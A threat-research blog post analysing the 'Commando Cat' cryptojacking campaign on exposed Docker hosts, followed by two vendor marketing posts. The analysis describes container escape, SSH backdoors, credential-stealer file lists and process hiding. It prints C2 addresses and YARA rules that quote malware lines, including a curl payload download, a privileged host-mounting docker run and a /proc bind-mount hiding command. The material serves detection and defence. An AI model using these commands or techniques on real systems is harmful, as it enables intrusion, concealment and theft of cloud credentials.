Blog
/
/
January 2, 2024

The Nine Lives of Commando Cat: Analyzing a Novel Malware Campaign Targeting Docker

"Commando Cat" is a novel cryptojacking campaign exploiting exposed Docker API endpoints. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher
Default blog image
02
Jan 2024

Summary

  • Commando Cat is a novel cryptojacking campaign exploiting Docker for Initial Access
  • The campaign deploys a benign container generated using the Commando Project [1]
  • The attacker escapes this container and runs multiple payloads on the Docker host
  • The campaign deploys a credential stealer payload, targeting Cloud Service Provider credentials (AWS, GCP, Azure)
  • The other payloads exhibit a variety of sophisticated techniques, including an interesting process hiding technique (as discussed below) and a Docker Registry blackhole

Introduction: Commando cat

Cado Security labs (now part of Darktrace) encountered a novel malware campaign, dubbed “Commando Cat”, targeting exposed Docker API endpoints. This is the second campaign targeting Docker since the beginning of 2024, the first being the malicious deployment of the 9hits traffic exchange application, a report which was published only a matter of weeks prior. [2]

Attacks on Docker are relatively common, particularly in cloud environments. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives. Commando Cat is a cryptojacking campaign leveraging Docker as an initial access vector and (ab)using the service to mount the host’s filesystem, before running a series of interdependent payloads directly on the host. 

As described in the coming sections, these payloads are responsible for registering persistence, enabling a backdoor, exfiltrating various Cloud Service Provider credential files and executing the miner itself. Of particular interest are a number of evasion techniques exhibited by the malware, including an unusual process hiding mechanism. 

Initial access

The payloads are delivered to exposed Docker API instances over the Internet by the IP 45[.]9.148.193 (which is the same as C2). The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat (also known as Commando) project “generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command.” 

It is likely used by the attacker to seem like a benign tool and not arouse suspicion.

The attacker then creates the container with a custom command to execute:

Container image with custom command to execute
Figure 1: Container with custom command to execute

It uses the chroot to escape from the container onto the host operating system. This initial command checks if the following services are active on the system:

  • sys-kernel-debugger
  • gsc
  • c3pool_miner
  • Dockercache

The gsc, c3pool_miner, and dockercache services are all created by the attacker after infection. The purpose of the check for sys-kernel-debugger is unclear - this service is not used anywhere in the malware, nor is it part of Linux. It is possible that the service is part of another campaign that the attacker does not want to compete with.

Once these checks pass, it runs the container again with another command, this time to infect it:

Container with infect command
Figure 2: Container with infect command

This script first chroots to the host, and then tries to copy any binaries named wls or cls to wget and curl respectively. A common tactic of cryptojacking campaigns is that they will rename these binaries to evade detection, likely the attacker is anticipating that this box was previously infected by a campaign that renamed the binaries to this, and is undoing that. The attacker then uses either wget or curl to pull down the user.sh payload.

This is repeated with the sh parameter changed to the following other scripts:

  • tshd
  • gsc
  • aws

In addition, another payload is delivered directly as a base64 encoded script instead of being pulled down from the C2, this will be discussed in a later section.

user.sh

The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password.

On startup, the script changes the permissions and attributes on various system files such as passwd, shadow, and sudoers in order to allow for the creation of the backdoor user:

Script
Figure 3

It then calls a function called make_ssh_backdoor, which inserts the following RSA and ED25519 SSH key into the root user’s authorized_keys file:

function make_ssh_backdoor
Figure 4

It then updates a number of SSH config options in order to ensure root login is permitted, along with enabling public key and password authentication. It also sets the AuthorizedKeysFile variable to a local variable named “$hidden_authorized_keys”, however this variable is never actually defined in the script, resulting in public key authentication breaking.

Once the SSH backdoor has been installed, the script then calls make_hidden_door. The function creates a new user called “games” by adding an entry for it directly into /etc/passwd and /etc/shadow, as well giving it sudo permission in /etc/sudoers.

The “games” user has its home directory set to /usr/games, likely as an attempt to appear as legitimate. To continue this theme, the attacker also has opted to set the login shell for the “games” user as /usr/bin/nologin. This is not the path for the real nologin binary, and is instead a copy of bash placed here by the malware. This makes the “games” user appear as a regular service account, while actually being a backdoor.

Games user
Figure 5

With the two backdoors in place, the malware then calls home with the SSH details to an API on the C2 server. Additionally, it also restarts sshd to apply the changes it made to the configuration file, and wipes the bash history.

SSH details
Figure 6

This provides the attacker with all the information required to connect to the server via SSH at any time, using either the root account with a pubkey, or the “games” user with a password or pubkey. However, as previously mentioned, pubkey authentication is broken due to a bug in the script. Consequently, the attacker only has password access to “games” in practice.

tshd.sh

This script is responsible for deploying TinyShell (tsh), an open source Unix backdoor written in C [3]. Upon launch, the script will try to install make and gcc using either apk, apt, or yum, depending on which is available. The script then pulls a copy of the tsh binary from the C2 server, compiles it, and then executes it.

Script
Figure 7

TinyShell works by listening on the host for incoming connections (on port 2180 in this case), with security provided by a hardcoded encryption key in both the client and server binaries. As the attacker has graciously provided the code, the key could be identified as “base64st”. 

A side effect of this is that other threat actors could easily scan for this port and try authenticating using the secret key, allowing anyone with the skills and resources to take over the botnet. TinyShell has been commonly used as a payload before, as an example, UNC2891 has made extensive use of TinyShell during their attacks on Oracle Solaris based systems [4].
The script then calls out to a freely available IP logger service called yip[.]su. This allows the attacker to be notified of where the tsh binary is running, to then connect to the infected machine.

Script
Figure 8

Finally, the script drops another script to /bin/hid (also referred to as hid in the script), which can be used to hide processes:

Script
Figure 9

This script works by cloning the Linux mtab file (a list of the active mounts) to another directory. It then creates a new bind mount for the /proc/pid directory of the process the attacker wants to hide, before restoring the mtab. The bind mount causes any queries to the /proc/pid directory to show an empty directory, causing tools like ps aux to omit the process. Cloning the mtab and then restoring the older version also hides the created bind mount, making it harder to detect.

The script then uses this binary to hide the tshd process.

gsc.sh

This script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. It’s purpose is likely for acting as a backdoor in scenarios where traditional backdoors like TinyShell would not work, such as when the infected host is behind NAT.

Gs-netcat works in a somewhat interesting way - in order for nodes to find each other, they use their shared secret instead of IP address using the  service. This permits gs-netcat to function in virtually every environment as it circumvents many firewalls on both the client and server end. To calculate a shared secret, the script simply uses the victims IP and hostname:

Script
Figure 10

This is more acceptable than tsh from a security point of view, there are 4 billion possible IP addresses and many more possible hostnames, making a brute force harder, although still possible by using strategies such as lists of common hostnames and trying IPs from blocks known for hosting virtual servers such as AWS.

The script proceeds to set up gs-netcat by pulling it from the attacker’s C2 server, using a specific version based on the architecture of the infected system. Interestingly to note, the attacker will use the cmd.cat containers to untar the downloaded payload, if tar is not available on the system or fails. Instead of using /tmp, it also uses /dev/shm instead, which acts as a temporary file store, but memory backed instead. It is possible that this is an evasion mechanism, as it is much more common for malware to use /tmp. This also results in the artefacts not touching the disk, making forensics somewhat more difficult. This technique has been used before in BPFdoor - a high-profile Linux campaign [6].

Script
Figure 11

Once the binary has been installed, the script creates a malicious systemd service unit to achieve persistence. This is a very common method for Linux malware to obtain persistence; however not all systems use systemd, resulting in this payload being rendered entirely ineffective on these systems. $VICCS is the shared secret discussed earlier, which is stored in a file and passed to the process.

Script
Figure 12

The script then uses the previously discussed hid binary to hide the gs-netcat process. It is worth noting that this will not survive a reboot, as there is no mechanism to hide the process again after it is respawned by systemd.

Script
Figure 13

Finally, the malware sends the shared secret to the attacker via their API, much like how it does with SSH:

Script
Figure 14

This allows the attacker to run their client instance of gs-netcat with the shared secret and gain persistent access to the infected machine.

aws.sh

The aws.sh script is a credential grabber that pulls credentials from several files on disk, as well as IMDS, and environment variables. Interestingly, the script creates a file so that once the script runs the first time, it can never be run again as the file is never removed. This is potentially to avoid arousing suspicion by generating lots of calls to IMDS or the AWS API, as well as making the keys harvested by the attacker distinct per infected machine.

The script overall is very similar to scripts that have been previously attributed to TeamTNT and could have been copied from one of their campaigns [7.] However, script-based attribution is difficult, and while the similarities are visible, it is hard to attribute this script to any particular group.

Script
Figure 15

The first thing run by the script (if an AWS environment is detected) is the AWS grabber script. Firstly, it makes several requests to IMDS in order to obtain information about the instance’s IAM role and the security credentials for it. The timeout is likely used to stop this part of the script taking a long time to run on systems where IMDS is not available. It would also appear this script only works with IMDSv1, so can be rendered ineffective by enforcing IMDSv2.

Script
Figure 16

Information of interest to the attacker, such as instance profiles, access keys, and secret keys, are then extracted from the response and placed in a global variable called CSOF, which is used throughout the script to store captured information before sending it to the API.

Next, it checks environment variables on the instance for AWS related variables, and adds them to CSOF if they are present.

Script
Figure 17

Finally, it adds the sts caller identity returned from the AWS command line to CSOF.

Next up is the cred_files function, which executes a search for a few common credential file names and reads their contents into CSOF if they are found. It has a few separate lists of files it will try to capture.

CRED_FILE_NAMES:

  • "authinfo2"
  • "access_tokens.db"
  • ".smbclient.conf"
  • ".smbcredentials"
  • ".samba_credentials"
  • ".pgpass"
  • "secrets"
  • ".boto"
  • ".netrc"
  • "netrc"
  • ".git-credentials"
  • "api_key"
  • "censys.cfg"
  • "ngrok.yml"
  • "filezilla.xml"
  • "recentservers.xml"
  • "queue.sqlite3"
  • "servlist.conf"
  • "accounts.xml"
  • "kubeconfig"
  • "adc.json"
  • "azure.json"
  • "clusters.conf" 
  • "docker-compose.yaml"
  • ".env"

AWS_CREDS_FILES:

  • "credentials"
  • ".s3cfg"
  • ".passwd-s3fs"
  • ".s3backer_passwd"
  • ".s3b_config"
  • "s3proxy.conf"

GCLOUD_CREDS_FILES:

  • "config_sentinel"
  • "gce"
  • ".last_survey_prompt.yaml"
  • "config_default"
  • "active_config"
  • "credentials.db"
  • "access_tokens.db"
  • ".last_update_check.json"
  • ".last_opt_in_prompt.yaml"
  • ".feature_flags_config.yaml"
  • "adc.json"
  • "resource.cache"

The files are then grabbed by performing a find on the root file system for their name, and the results appended to a temporary file, before the final concatenation of the credentials files is read back into the CSOF variable.

CSOF variable
Figure 18

Next up is get_prov_vars, which simply loops through all processes in /proc and reads out their environment variables into CSOF. This is interesting as the payload already checks the environment variables in a lot of cases, such as in the aws, google, and azure grabbers. So, it is unclear why they grab all data, but then grab specific portions of the data again.

Code
Figure 19

Regardless of what data it has already grabbed, get_google and get_azure functions are called next. These work identically to the AWS environment variable grabber, where it checks for the existence of a variable and then appends its contents (or the file’s contents if the variable is path) to CSOF.

Code
Figure 20

The final thing it grabs is an inspection of all running docker containers via the get_docker function. This can contain useful information about what's running in the container and on the box in general, as well as potentially providing more secrets that are passed to the container.

Code
Figure 21

The script then closes out by sending all of the collected data to the attacker. The attacker has set a username and password on their API endpoint for collected data, the purpose for which is unclear. It is possible that the attacker is concerned with the endpoint being leaked and consequently being spammed with false data by internet vigilantes, so added the authentication as a mechanism allowing them to cycle access by updating the payload and API.

Code
Figure 22

The base64 payload

As mentioned earlier, the final payload is delivered as a base64 encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash. This is an extremely common evasion mechanism, with many script-based Linux threat actors using the same approach. It is interesting to note that the C2 IP used in this script is different from the other payloads.

The base64 payload serves two primary purposes, to deploy an XMRig cryptominer, and to “secure” the docker install on the infected host.

When it is run, the script looks for traces of other malware campaigns. Firstly, it removes all containers that have a command of /bin/bash -c 'apt-get or busybox, and then it removes all containers that do not have a command that contains chroot (which is the initial command used by this payload).

Code
Figure 23

Next, it looks for any services named “c3pool_miner” or “moneroocean_miner” and stops & disables the services. It then looks for associated binaries such as /root/c3pool/xmrig and /root/moneroocean/xmrig and deletes them from the filesystem. These steps are taken prior to deploying their own miner, so that they aren't competing for CPU time with other threat actors.

Once the competing miners have been killed off, it then sets up its own miner. It does this by grabbing a config and binary from the C2 server and extracting it to /usr/sbin. This drops two files: docker-cache and docker-proxy.

The docker-proxy binary is a custom fork of XMRig, with the path to the attacker’s config file hardcoded in the binary. It is invoked by docker-cache, which acts as a stager to ensure it is running, while also having the functionality to update the binary, should a file with .upd be detected.

It then uses a systemd service to achieve persistence for the XMRig stager, using the name docker cache daemon to appear inconspicuous. It is interesting to note that the name dockercache was also used by the Cetus cryptojacking worm .

Code
Figure 24

It then uses the hid script discussed previously to hide the docker-cache and docker-proxy services by creating a bind mount over their /proc entry. The effect of this is that if a system administrator were to use a tool like htop to try and see what process was using up the CPU on the server, they would not be able to see the process.

Finally, the attacker “secures” docker. First, it pulls down alpine and tags it as docker/firstrun (this will become clear as to why later), and then deletes any images in a hardcoded list of images that are commonly used in other campaigns.

Code
Figure 25

Next, it blackholes the docker registry by writing it's hostname to /etc/hosts with an IP of 0.0.0.0

Code
Figure 26

This completely blocks other attackers from pulling their images/tools onto the box, eliminating the risk of competition. Keeping the Alpine image named as docker/firstrun allows the attacker to still use the docker API to spawn an alpine box they can use to break back in, as it is already downloaded so the blackhole has no effect.

Conclusion

This malware sample, despite being primarily scripts, is a sophisticated campaign with a large amount of redundancy and evasion that makes detection challenging. The usage of the hid process hider script is notable as it is not commonly seen, with most malware opting to deploy clunkier rootkit kernel modules. The Docker Registry blackhole is also novel, and very effective at keeping other attackers off the box.

The malware functions as a credential stealer, highly stealthy backdoor, and cryptocurrency miner all in one. This makes it versatile and able to extract as much value from infected machines as possible. The payloads seem similar to payloads deployed by other threat actors, with the AWS stealer in particular having a lot of overlap with scripts attributed to TeamTNT in the past. Even the C2 IP points to the same provider that has been used by TeamTNT in the past. It is possible that this group is one of the many copycat groups that have built on the work of TeamTNT.

Indicators of compromise (IoCs)

Hashes

user 5ea102a58899b4f446bb0a68cd132c1d

tshd 73432d368fdb1f41805eba18ebc99940

gsc 5ea102a58899b4f446bb0a68cd132c1d

aws 25c00d4b69edeef1518f892eff918c2c

base64 ec2882928712e0834a8574807473752a

IPs

45[.]9.148.193

103[.]127.43.208

Yara Rule

rule Stealer_Linux_CommandoCat { 
 
meta: 

        description = "Detects CommandoCat aws.sh credential stealer script" 
 
        license = "Apache License 2.0" 
 
        date = "2024-01-25" 
 
        hash1 = "185564f59b6c849a847b4aa40acd9969253124f63ba772fc5e3ae9dc2a50eef0" 
 
    strings: 
 
        // Constants 

        $const1 = "CRED_FILE_NAMES" 
 
        $const2 = "MIXED_CREDFILES" 
 
        $const3 = "AWS_CREDS_FILES" 
 
        $const4 = "GCLOUD_CREDS_FILES" 
 
        $const5 = "AZURE_CREDS_FILES" 
 
        $const6 = "VICOIP" 
 
        $const7 = "VICHOST" 

 // Functions 
 $func1 = "get_docker()" 
 $func2 = "cred_files()" 
 $func3 = "get_azure()" 
 $func4 = "get_google()" 
 $func5 = "run_aws_grabber()" 
 $func6 = "get_aws_infos()" 
 $func7 = "get_aws_meta()" 
 $func8 = "get_aws_env()" 
 $func9 = "get_prov_vars()" 

 // Log Statements 
 $log1 = "no dubble" 
 $log2 = "-------- PROC VARS -----------------------------------" 
 $log3 = "-------- DOCKER CREDS -----------------------------------" 
 $log4 = "-------- CREDS FILES -----------------------------------" 
 $log5 = "-------- AZURE DATA --------------------------------------" 
 $log6 = "-------- GOOGLE DATA --------------------------------------" 
 $log7 = "AWS_ACCESS_KEY_ID : $AWS_ACCESS_KEY_ID" 
 $log8 = "AWS_SECRET_ACCESS_KEY : $AWS_SECRET_ACCESS_KEY" 
 $log9 = "AWS_EC2_METADATA_DISABLED : $AWS_EC2_METADATA_DISABLED" 
 $log10 = "AWS_ROLE_ARN : $AWS_ROLE_ARN" 
 $log11 = "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE" 

 // Paths 
 $path1 = "/root/.docker/config.json" 
 $path2 = "/home/*/.docker/config.json" 
 $path3 = "/etc/hostname" 
 $path4 = "/tmp/..a.$RANDOM" 
 $path5 = "/tmp/$RANDOM" 
 $path6 = "/tmp/$RANDOM$RANDOM" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat gsc.sh backdoor registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "d083af05de4a45b44f470939bb8e9ccd223e6b8bf4568d9d15edfb3182a7a712" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "SETPATH" 
 $const3 = "SETNAME" 
 $const4 = "SETSERV" 
 $const5 = "VICIP" 
 $const6 = "VICHN" 
 $const7 = "GSCSTATUS" 
 $const8 = "VICSYSTEM" 
 $const9 = "GSCBINURL" 
 $const10 = "GSCATPID" 

 // Functions 
 $func1 = "hidfile()" 

 // Log Statements 
 $log1 = "run gsc ..." 

 // Paths 
 $path1 = "/dev/shm/.nc.tar.gz" 
 $path2 = "/etc/hostname" 
 $path3 = "/bin/gs-netcat" 
 $path4 = "/etc/systemd/gsc" 
 $path5 = "/bin/hid" 

 // General 
 $str1 = "mount --bind /usr/foo /proc/$1" 
 $str2 = "cp /etc/mtab /usr/t" 
 $str3 = "docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat_tshd { 
 meta: 
 description = "Detects CommandoCat tshd TinyShell registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "65c6798eedd33aa36d77432b2ba7ef45dfe760092810b4db487210b19299bdcb" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "HOME" 
 $const3 = "TSHDPID" 

 // Functions 
 $func1 = "setuptools()" 
 $func2 = "hidfile()" 
 $func3 = "hidetshd()" 

 // Paths 
 $path1 = "/var/tmp" 
 $path2 = "/bin/hid" 
 $path3 = "/etc/mtab" 
 $path4 = "/dev/shm/..tshdpid" 
 $path5 = "/tmp/.tsh.tar.gz" 
 $path6 = "/usr/sbin/tshd" 
 $path7 = "/usr/foo" 
 $path8 = "./tshd" 

 // General 
 $str1 = "curl -Lk $SRCURL/bin/tsh/tsh.tar.gz -o /tmp/.tsh.tar.gz" 
 $str2 = "find /dev/shm/ -type f -size 0 -exec rm -f {} \\;" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

References:

  1. https://github.com/lukaszlach/commando
  2. www.darktrace.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
  3. https://github.com/creaktive/tsh
  4. https://cloud.google.com/blog/topics/threat-intelligence/unc2891-overview/
  5. https://www.gsocket.io/
  6. https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
  7. https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
  8. https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher

More in this series

No items found.

Blog

/

/

July 1, 2026

5 Ways AI is changing traditional security models according to modern CISOs

Default blog imageDefault blog image

The Reality of Securing AI in Motion

Traditional security tools were built for environments defined by fixed rules and predictable workflows. But AI behavior is non-deterministic. The same prompt can produce different outcomes, and risk often emerges gradually as AI behavior adapts, and permissions drift over time. This creates a constantly shifting environment where security teams are working to define control in a system that resists stability. “In AI security, yesterday's priorities can become tomorrow's blind spots. The landscape shifts that fast,” warned the SVP and Head of Technology and Cybersecurity of a real estate investment trust. Conventional approaches, which rely on establishing and maintaining a steady baseline, struggle to keep up with that level of change.

At the same time, AI adoption is accelerating across organizations, often faster than security teams can implement the controls needed to manage it. “The car is being built while it’s already on the road,” explained the CISO of a global private fund administrator. “The threats we're securing against today won't be the threats we're facing tomorrow. What kept us up three months ago looks nothing like what we're dealing with today.”

As businesses move quickly to unlock value from AI, security teams are left closing gaps in real time, while also facing adversaries who are using AI to make their attacks more scalable, adaptive, and difficult to detect. In this recent roundtable discussion of CISOs and security leaders, five themes emerged around AI cyber risk.  

1. AI agents with human access but no human judgment

In Darktrace’s 2026 State of AI Cybersecurity report, 96% of the surveyed security professionals agree that AI significantly improves the speed and efficiency with which they work. Yet, 92% admitted that they’re concerned with the security implications of the use of AI agents across their workforce.

AI agents now operate with human-level permissions across systems, acting at machine speed, orchestrating actions across platforms, and making decisions without the judgment or caution a person would apply. Unlike human users, they cannot be expected to pause and question whether a given action is appropriate.

Their identities are also difficult to inventory, govern, and audit. As agents become easier to deploy than legacy IT systems ever were, organizations are quickly losing track of what is running, what it has access to, and what it is doing. This creates a growing class of highly privileged, autonomous actors operating without the visibility or oversight that traditional identity and access controls were designed to provide.“While AI adoption is critical to running a modern business, AI alone can’t solve all our cybersecurity challenges,” said a global financial sector CISO. “We still need think critically and use human judgement. Those are two things AI can’t do.”

This lack of human judgment becomes especially risky as new architectures, such as Model Context Protocol (MCP), can expand how agents connect to data, tools, and external systems. By design, MCP enables agents to dynamically discover and interact with new resources, increasing flexibility but also introducing new pathways for unintended access, data exposure, or abuse if not properly governed.

The CISO of a fund administrator highlighted one emerging vector as an example: rogue MCP servers. “Our developers want to move quickly and bring value to the business, but technologies like these can unintentionally expose sensitive data in ways that would never have happened before.”

2. Increased digital complexity and expanded attack surface

AI activity rarely stays contained. A single prompt can trigger a chain of actions across networks, email, cloud infrastructure, SaaS platforms, endpoints, identity systems, and development environments, spanning systems that were never designed to be secured as a single, connected flow. This expands both the scale and complexity of what security teams need to monitor and defend.

Yet no single control has visibility across that entire chain. “You can’t defend effectively what you can’t see,” cautioned the private fund administrator CISO. As AI-driven activity moves fluidly across environments, gaps in coverage become inevitable, creating blind spots that attackers can exploit.

Threat actors are already capitalizing on this lack of visibility. “Threat actors have advanced their use of generative AI to launch more convincing phishing campaigns, automate social engineering, and scale attacks with greater precision down to the individual level,” said the SVP of Technology and Cybersecurity for the real estate investment trust. What was once manual and targeted can now be automated and personalized at scale, making attacks harder to detect and easier to execute.

At the same time, the pace of exploitation is accelerating. As a global CISO operating across 40+ countries described it: “Zero-day vulnerabilities are no longer zero day; it’s minus one day. By the time you get to it and address it, it’s already a problem.” By the time risk is identified, it has often already been realized.

The result is a rapidly expanding and increasingly interconnected attack surface that challenges security teams to maintain visibility, context, and control across AI-driven activity.

3. Shadow AI is already everywhere

76% of organizations now cite shadow AI as a problem, one that is spreading through organizations in ways that are hard to track and even harder to control.

Employees are experimenting with publicly available Gen AI tools. Teams are spinning up low-code automations on their own. SaaS providers are quietly embedding AI into existing products. Developers are plugging AI services directly into workflows, often without pausing to consider what that exposure means.

The result is a lack of visibility into:

  • What AI tools are being used
  • What data those tools can access
  • Where prompts and outputs are going
  • Which AI agents are interacting with enterprise systems

The SVP of Cybersecurity at a real estate investment trust described the shift: “Before, I was worried about someone sending data erroneously to their personal email. Now we have all these agents online that people are utilizing, and we’re looking at those vectors as well.” For security teams, this means operating without a complete view of how AI is being used, what it can access, and where risk may already be emerging.

4. Built-in guardrails are not enough

Organizations often assume that native AI guardrails or provider-level controls are sufficient to manage AI risk. But securing AI requires ongoing visibility, oversight, and governance, not just controls configured at deployment. "It’s a misconception that adopting AI is going to solve all your problems,” warns a global financial services CISO.

Security leaders are increasingly recognizing the limitations of these controls as:

  • Fragmented and difficult to enforce consistently across multiple AI systems, workflows, and environments
  • Ambiguous in terms of accountability due to shared responsibility for AI governance between IT, security, developers, business teams, and third-party providers
  • Limited in end-to-end oversight, leaving gaps that stretch from the initial prompt all the way through to the downstream impact of an agent's actions

Securing AI demands more than simple prompt filtering or static policy enforcement. It requires understanding intent, behavior, and context across both human and AI activity.

The next phase of cybersecurity: securing AI

To safely and responsibly adopt AI at scale, organizations need a new operational model for cybersecurity that’s capable of:

• Understanding AI behavior

• Identifying risk in real time

• Maintaining governance without slowing innovation

The CSO of a $10 billion municipal utility organization described the challenge with precision: “We have to move at the speed of innovation and risk, because both are accelerating faster than ever.”

Embrace AI with confidence with Darktrace / SECURE AI

Darktrace has introduced Darktrace / SECURE AI™, a new product within the Darktrace ActiveAI Security Platform™  ,designed to provide enterprise-wide security for AI by applying industry leading behavioral analysis to how prompts, agents, and AI systems are used.

Darktrace / SECURE AITM delivers real-time visibility and control across Enterprise and SaaS GenAI prompts, AI agent identities, development and production environments, and Shadow AI - detecting even subtle misuse, misconfiguration, and drift that traditional, rule-based controls simply do not understand. By interpreting context and intent across humans and machines, Darktrace enables organizations to adopt AI at scale without introducing unmanaged risk

What makes this possible is Darktrace’s decade-long maturity and expertise in behavioral understanding and AI-native cybersecurity. Achieved with Self-Learning AI that has been proven across more than 10,000 organizations, Darktrace understands what “normal” looks like for a business, across its users, systems, and now AI, so that meaningful deviations can be detected and acted on before they become incidents.

With one CISO describing Darktrace’s Self-Learning AI as “a leap forward compared to other tools” and another as a “force multiplier,” the technology can interpret ambiguous interactions, understand how access accumulates over time, and recognize when behavior, human or machine, begins to drift.

“Strategically, we’re looking to gain more visibility into how AI is operating across the environment and achieve greater control over what AI should be allowed to access and do,” shared the CISO at a private fund administrator.  

“What I’ve seen from Darktrace / SECURE AI is extremely promising. I have tremendous confidence in Darktrace’s vision for where this is headed and its ability to execute on this new solution.”

Continue reading
About the author
The Darktrace Community

Blog

/

Email

/

June 29, 2026

How Darktrace Transformed Cybersecurity at Our Health Center: A CIO’s Perspective

Default blog imageDefault blog image

How Darktrace Transformed Cybersecurity at Our Health Center: A CIO’s Perspective

In my role as CIO, I bring years of experience leading IT for healthcare organizations. I’ve seen firsthand the unique cybersecurity challenges that nonprofit health centers face: limited budgets, small IT teams, and the constant pressure to prioritize patient care over technology investments. Yet, the threat landscape for health is relentless, and the stakes for protecting patient data and ensuring operational continuity have never been higher. It’s a balancing act.

The search for a better solution

Like many nonprofits, organizations I work at start with Microsoft’s security stack. The discounted pricing for nonprofits makes it an obvious choice, and Microsoft Defender provided a solid foundation for endpoint and email security. However, I quickly realized that relying on a single vendor, even one as robust as Microsoft, left gaps in our defenses. Cybersecurity is never one-size-fits-all, which is why my preference was to layer an additional solution on top of our native security to improve our security posture.

Teams needed a solution that could layer seamlessly on top of Microsoft, without adding complexity or draining limited resources. That’s when I found Darktrace. I had heard of their reputation after seeing how other organizations used Darktrace to secure their infrastructure and was impressed by their AI-native, agentless approach and agreed to a proof of value (POV).

Our goal was to elavate Microsoft with an additional layer of intelligence- one that could seamlessly integrate, operate autonomously, and support a small team without increasing overhead. We turned to Darktrace because its AI-native, agentless approach offered a fundamentally different way to detect and respond to threats, learning our environment in real time and filling gaps that traditional tools can miss. With a quick POV, we were able to validate how effectively Darktrace works alongside Microsoft to deliver a more complete and resilient security architecture.

Why Darktrace stood out

From the start, Darktrace differentiated itself in several critical ways:

  • Deep visibility: Unlike other solutions that rely simply on host-based monitoring with endpoint agents, Darktrace operates passively at the network layer and integrates via APIs for email and identity security. This gave full visibility into network traffic that we previously didn’t have, going beyond our existing endpoint-based tools without adding additional maintenance overhead for our small IT team.
  • AI-native from the ground up: Darktrace wasn’t just layering AI on top of an existing product; it was built with AI at its core. Their autonomous detection and response to threats immediately reduced the need for constant human supervision. In a world where cyber-attacks are increasingly sophisticated and subtle, having an AI that learns our environment and adapts in real time is invaluable.
  • Comprehensive coverage: We started with a POV focused on email security, but quickly expanded to full deployment across our entire infrastructure. Darktrace’s products now protect our email, network, and identity layers, providing visibility and defense against lateral movement and abnormal behavior that traditional tools often miss.

Integration and workflow: Smooth and simple

One of the most impressive aspects of Darktrace is how easy it was to integrate into an existing environment. For network security, it was as simple as plugging an appliance into our top-of-rack switch – no downtime, no complex configuration. For email and identity, API integrations meant we could be up and running in hours, not weeks.

This simplicity extended to day-to-day operations. Our IT team received regular security reports, and any time we had questions or needed to adjust policies, Darktrace’s support team was there with white-glove service. Their responsiveness- even in the middle of the night- gave us confidence that we had true partners, not just a vendor.

Real-world impact: Threats stopped, time saved

The results spoke for themselves. During the time with Darktrace, I did not experience any security incidents. The team slept better at night knowing that Darktrace was monitoring for anomalies and proactively blocking suspicious activity, alerting us even before we noticed anything was wrong.

A memorable example was during an Electronic Health Record (EHR) upgrade, when my team forgot to adjust the policy in advance. Darktrace’s autonomous response was so effective that it blocked our upgrade activities- proof that nothing, not even internal changes, could slip by unnoticed. This level of vigilance meant that ransomware, data exfiltration attempts, or insider threats would be detected and contained before causing harm.

While I can’t share specific ROI numbers, the value was clear: we’ve avoided costly breaches, reduced the time spent investigating alerts, and eliminated the performance drag of agent-based tools. With Darktrace layered on top of Microsoft, I’ve hit the right balance of maximum protection with minimal spending. The cost of Darktrace / EMAIL was competitive, especially when factoring in the included Managed Detection and Response (MDR) service, which provides expert human oversight on top of the AI.

Key differentiators over the competition

  • Extending visibility beyond the endpoint: Traditional host-based monitoring solutions, such as EDR, play a critical role in securing individual devices. By adding a network detection and response (NDR) layer, we gained visibility into activity across our wider digital environment, surfacing threats that move laterally, operate between devices, or bypass endpoint controls. Darktrace also stood out for its ability to learn our normal patterns of behavior and identify subtle deviations in real time, not just known indicators of compromise. Because this is delivered through passive, non-disruptive monitoring, we were able to strengthen our defenses without adding complexity or impacting performance.
  • Layered security without complexity: Darktrace elevated our Microsoft foundation without creating conflicts or requiring us to disable existing protections. This layered approach maximized our security posture without adding operational burden.
  • Expert partnership: Beyond technology, Darktrace’s team acted as true partners, guiding us through deployment, providing ongoing support, and helping us interpret findings. This partnership was as valuable as the technology itself.

Advice for other nonprofits

If you’re an IT leader in a nonprofit, my advice is simple: look for solutions that are easy to deploy, intelligent in their response, and cost-effective. Don’t settle for more endpoint based tools that overlap with what you already have. Seek out a layered approach that covers your blind spots – especially at the network and email layers- at a price point that suits your organization.

Most importantly, don’t be afraid to evaluate new solutions. Even if you’re inundated with vendor pitches, you owe it to your organization to explore options that could save you time, money, and sleepless nights.

For organizations I work at, combining Microsoft’s security stack with Darktrace’s AI-native, platform struck the right balance between protection and practicality. We gained enterprise-grade security without sacrificing performance or stretching our budget. In the end, that meant more resources for what matters most: delivering care to our patients. If you’re facing similar challenges, I encourage you to consider how Darktrace could transform your security posture, and give your team the peace of mind they deserve.

